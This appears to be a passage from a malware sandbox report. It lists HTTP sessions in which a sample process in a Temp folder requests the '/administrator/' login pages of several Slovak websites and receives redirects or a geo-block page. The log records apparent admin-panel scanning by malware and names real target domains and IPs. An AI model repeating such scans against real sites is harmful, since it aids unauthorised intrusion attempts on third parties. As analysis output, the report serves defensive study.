                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.787964106 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                44192.168.2.452780185.32.160.10805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.534183979 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: detmar.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.786304951 CET523INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Phusion_Passenger/6.0.14
                                                                                                                                                                                                                                                                                                                                Location: http://www.detmar.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 74 6d 61 72 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.detmar.sk/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                45192.168.2.45277637.9.175.188805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.534183025 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.791327000 CET1286INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Data Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 2e 77 65 62 73 75 70 70 6f 72 74 2e 73 6b 2f 73 74 61 74 69 63 2f 77 65 62 73 75 70 70 6f 72 74 2d 6c 6f 67 6f 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 70 6e 67 3e 0a 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 0a 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e 0a 3c 70 3e 3c 62 72 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 20 20 76 61 72 20 5f 67 61 71 20 3d 20 5f 67 61 71 20 7c 7c 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 37 32 38 33 34 38 36 2d 33 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 74 72 61 63 6b 50 61 67 65 76 69 65 77 27 5d 29 3b 0a 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 67 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 67 61 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20 67 61 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 67 61 2e 73 72 63 20 3d 20 28 27 68 74 74 70 73 3a 27 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3f 20 27 68 74 74 70 73 3a 2f 2f 73 73 6c 27 20 3a 20 27 68 74 74 70 3a 2f 2f 77 77 77 27 29 20 2b 20 27 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3b 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 61 2c 20 73 29 3b 0a 20 20 7d 29 28 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 66 6f 6e 74 20 73 69 7a 65 3d 2b 32 3e 3c 62 3e 53 4b 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 62 72 3e 0a 5a 20 64 c3 b4 76 6f 64 75 20 6f 63 68 72 61 6e 79 20 68 6f 73 74 69 6e 67 6f 76 20 70 72 65 64 20 6f 70 61 6b 75 6a c3 ba 63 69 6d 69 20 c3 ba 74 6f 6b 6d 69 20 73 6d 65 20 62 6f 6c 69 20 6e c3 ba 74 65 6e c3 ad 20 70 72 65 20 76 79 62 72 61 6e c3 a9 20 6b 72 61 6a 69 6e 79 20 6f 62 6d 65 64 7a 69 c5 a5 20 70 72 c3 ad 73 74 75 70 20 64 6f 20 61 64 6d 69 6e 69 73 74 72 61 74 c3 ad 76 6e 65 68 6f 20 72 6f 7a 68 72 61 6e 69 61 20 77 65 62 6f 76 c3 bd 63 68 20 73 74 72 c3 a1 6e 6f 6b 2e 20 50 6f 6b 69 61 c4 be 20 70 6f 74 72 65 62 75 6a 65 74 65 20 73 20 61 64 6d 69 6e 69 73 74 72 c3 a1 63 69 6f 75 20 70 72 61 63 6f 76 61 c5 a5 20 7a 6f 20 7a 61 68 72 61 6e 69 c4 8d 69 61 2c 20 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https://m.websupport.sk/static/websupport-logo-transparent.png></td></tr><tr><td align="left"><p><br><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-7283486-31']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script><font size=+2><b>SK</b></font><br>Z dvodu ochrany hostingov pred opakujcimi tokmi sme boli nten pre vybran krajiny obmedzi prstup do administratvneho rozhrania webovch strnok. Pokia potrebujete s administrciou pracova zo zahraniia, p
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.791404963 CET1286INData Raw: 72 6f 73 c3 ad 6d 20 70 72 69 68 6c c3 a1 73 74 65 20 73 61 20 64 6f 20 57 65 62 61 64 6d 69 6e 75 2c 20 70 72 65 6a 64 69 74 65 20 64 6f 20 73 70 72 c3 a1 76 79 20 64 6f 6d c3 a9 6e 79 20 61 20 76 20 73 65 6b 63 69 69 20 22 43 4d 53 20 2d 20 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: rosm prihlste sa do Webadminu, prejdite do sprvy domny a v sekcii "CMS - redakn systmy" kliknite na Vypn geoip filter.</p><p><font size=+2><b>EN</b></font><br>Due to protection of web servers from repeated attacks,
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.791414976 CET78INData Raw: 6f 6e 2e 20 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 61 20 6d 65 67 c3 a9 72 74 c3 a9 73 74 21 0a 3c 2f 70 3e 0a 0a 0a 3c 2f 74 64 3e 0a 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: on. Ksznjk a megrtst!</p></td></tr></table></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.791441917 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.795186996 CET242OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://aloeveraforever.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.051913023 CET1286INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Data Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 2e 77 65 62 73 75 70 70 6f 72 74 2e 73 6b 2f 73 74 61 74 69 63 2f 77 65 62 73 75 70 70 6f 72 74 2d 6c 6f 67 6f 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 70 6e 67 3e 0a 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 0a 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e 0a 3c 70 3e 3c 62 72 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 20 20 76 61 72 20 5f 67 61 71 20 3d 20 5f 67 61 71 20 7c 7c 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 37 32 38 33 34 38 36 2d 33 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 74 72 61 63 6b 50 61 67 65 76 69 65 77 27 5d 29 3b 0a 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 67 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 67 61 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20 67 61 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 67 61 2e 73 72 63 20 3d 20 28 27 68 74 74 70 73 3a 27 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3f 20 27 68 74 74 70 73 3a 2f 2f 73 73 6c 27 20 3a 20 27 68 74 74 70 3a 2f 2f 77 77 77 27 29 20 2b 20 27 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3b 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 61 2c 20 73 29 3b 0a 20 20 7d 29 28 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 66 6f 6e 74 20 73 69 7a 65 3d 2b 32 3e 3c 62 3e 53 4b 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 62 72 3e 0a 5a 20 64 c3 b4 76 6f 64 75 20 6f 63 68 72 61 6e 79 20 68 6f 73 74 69 6e 67 6f 76 20 70 72 65 64 20 6f 70 61 6b 75 6a c3 ba 63 69 6d 69 20 c3 ba 74 6f 6b 6d 69 20 73 6d 65 20 62 6f 6c 69 20 6e c3 ba 74 65 6e c3 ad 20 70 72 65 20 76 79 62 72 61 6e c3 a9 20 6b 72 61 6a 69 6e 79 20 6f 62 6d 65 64 7a 69 c5 a5 20 70 72 c3 ad 73 74 75 70 20 64 6f 20 61 64 6d 69 6e 69 73 74 72 61 74 c3 ad 76 6e 65 68 6f 20 72 6f 7a 68 72 61 6e 69 61 20 77 65 62 6f 76 c3 bd 63 68 20 73 74 72 c3 a1 6e 6f 6b 2e 20 50 6f 6b 69 61 c4 be 20 70 6f 74 72 65 62 75 6a 65 74 65 20 73 20 61 64 6d 69 6e 69 73 74 72 c3 a1 63 69 6f 75 20 70 72 61 63 6f 76 61 c5 a5 20 7a 6f 20 7a 61 68 72 61 6e 69 c4 8d 69 61 2c 20 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https://m.websupport.sk/static/websupport-logo-transparent.png></td></tr><tr><td align="left"><p><br><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-7283486-31']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script><font size=+2><b>SK</b></font><br>Z dvodu ochrany hostingov pred opakujcimi tokmi sme boli nten pre vybran krajiny obmedzi prstup do administratvneho rozhrania webovch strnok. Pokia potrebujete s administrciou pracova zo zahraniia, p
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052007914 CET1286INData Raw: 72 6f 73 c3 ad 6d 20 70 72 69 68 6c c3 a1 73 74 65 20 73 61 20 64 6f 20 57 65 62 61 64 6d 69 6e 75 2c 20 70 72 65 6a 64 69 74 65 20 64 6f 20 73 70 72 c3 a1 76 79 20 64 6f 6d c3 a9 6e 79 20 61 20 76 20 73 65 6b 63 69 69 20 22 43 4d 53 20 2d 20 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: rosm prihlste sa do Webadminu, prejdite do sprvy domny a v sekcii "CMS - redakn systmy" kliknite na Vypn geoip filter.</p><p><font size=+2><b>EN</b></font><br>Due to protection of web servers from repeated attacks,
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052037954 CET78INData Raw: 6f 6e 2e 20 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 61 20 6d 65 67 c3 a9 72 74 c3 a9 73 74 21 0a 3c 2f 70 3e 0a 0a 0a 3c 2f 74 64 3e 0a 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: on. Ksznjk a megrtst!</p></td></tr></table></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052108049 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                46192.168.2.45278483.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.535268068 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.791254997 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                47192.168.2.453917172.67.152.228805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.239190102 CET174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.375889063 CET695INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Location: https://keramat.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFFxdkEnrc9r6356JQIQiUgf%2B8rj1XIDs3tQd21x2kJcw7B3k%2BtaX1BmfDCGolVAmDnDNhAWoQhGNRcXZm3ZFdxv5k%2B0Z3RlQPuMxhy9b%2Fnv7Yd5owiC89Cu9nt1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c3f99dd74c8-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.011485100 CET227OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: https://keramat.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.141309977 CET708INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Location: https://keramat.sk/administrator/index.php
